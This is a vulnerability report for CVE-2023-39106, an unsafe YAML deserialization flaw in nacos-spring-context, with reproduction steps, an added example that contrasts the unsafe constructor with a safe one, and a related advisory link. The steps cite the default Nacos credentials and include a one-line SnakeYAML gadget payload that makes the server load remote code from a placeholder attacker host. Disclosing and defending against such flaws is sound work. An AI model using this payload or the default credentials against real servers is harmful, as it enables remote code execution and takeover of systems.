CVE-2023-39106: YAML deserialization vulnerability leads to RCE · Issue #314 · nacos-group/nacos-spring-project

An issue in Nacos Group Nacos Spring Project v.1.1.1 and before allows a remote attacker to execute arbitrary code via the SnakeYamls Constructor() component.


Issue Description

SnakeYAML's Constructor() class is used in the nacos-spring-context component, but it does not restrict the types that can be instantiated during deserialization.

Describe what happened (or what feature you want)

Deserializing YAML content provided by an attacker can lead to remote code execution.
So when a Spring Framework project uses nacos-spring-context as a dependency, it can easily be hit with RCE just by adding an evil config in the Nacos server.

Describe what you expected to happen

Unsupported YAML content.

How to reproduce it (as minimally and precisely as possible)

  1. Create an empty Spring Framework project and add the nacos-spring-context dependency.

  2. Add the code below, which, as the documentation says, sets up a NacosPropertySource:

    // The imports and the @NacosPropertySource annotation are the additions
    // to a default Spring Boot application (marked with '+' in the report).
    import com.alibaba.nacos.api.config.ConfigType;
    import com.alibaba.nacos.spring.context.annotation.config.NacosPropertySource;
    import org.springframework.boot.autoconfigure.SpringBootApplication;

    @SpringBootApplication
    @NacosPropertySource(dataId = "example.yaml", type = ConfigType.YAML, autoRefreshed = true)
    public class Application {

        public static void main(String[] args) {
            ......
        }
    }

  3. Now log in to the Nacos config server (by default at http://127.0.0.1:8848 with the credentials nacos/nacos), then edit example.yaml and add the one line of config below:

    test: !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL [ "http://evilsite.com" ]]]]
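To make the mechanism behind the report concrete, here is an added example (not code from the issue or from the Nacos project) that contrasts the unrestricted Constructor() the report names with SnakeYAML's SafeConstructor. It assumes SnakeYAML 1.33 on the classpath and feeds both loaders a constructed, harmless document that carries a global `!!java...` tag.

```java
import java.util.Map;
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.Constructor;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class YamlLoaderCheck {

    // Constructed sample input: a global tag naming an arbitrary JVM class.
    // A harmless class is used here; the instantiation path is the same one
    // the issue relies on with ScriptEngineManager and URLClassLoader.
    static final String TAGGED_YAML =
        "test: !!java.util.concurrent.atomic.AtomicInteger {}\n";

    /** Vulnerable pattern: Constructor() instantiates whatever class the tag names. */
    static Object loadUnrestricted(String yaml) {
        return new Yaml(new Constructor(new LoaderOptions())).load(yaml);
    }

    /** Hardened pattern: SafeConstructor builds only standard YAML types
     *  (maps, lists, scalars) and rejects global tags with a YAMLException. */
    static Object loadSafe(String yaml) {
        return new Yaml(new SafeConstructor(new LoaderOptions())).load(yaml);
    }

    public static void main(String[] args) {
        Map<?, ?> doc = (Map<?, ?>) loadUnrestricted(TAGGED_YAML);
        // Prints the class chosen by the YAML author, not by the application.
        System.out.println("Constructor() instantiated: "
            + doc.get("test").getClass().getName());

        try {
            loadSafe(TAGGED_YAML);
            System.out.println("unexpected: SafeConstructor accepted a global tag");
        } catch (YAMLException e) {
            // Expected outcome for untrusted config: the document is refused.
            System.out.println("SafeConstructor rejected it: " + e.getMessage());
        }
    }
}
```

Config fetched from a remote server such as Nacos should go through the SafeConstructor path; on SnakeYAML 2.x global tags are additionally denied by default unless a TagInspector explicitly allows them.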

Tell us your environment

spring-framework 2.7.8
nacos-spring-context 1.1.1

Anything else we need to know?

Related news

GHSA-v6c8-pwhq-288m: Nacos Spring vulnerable to Unsafe Deserialization
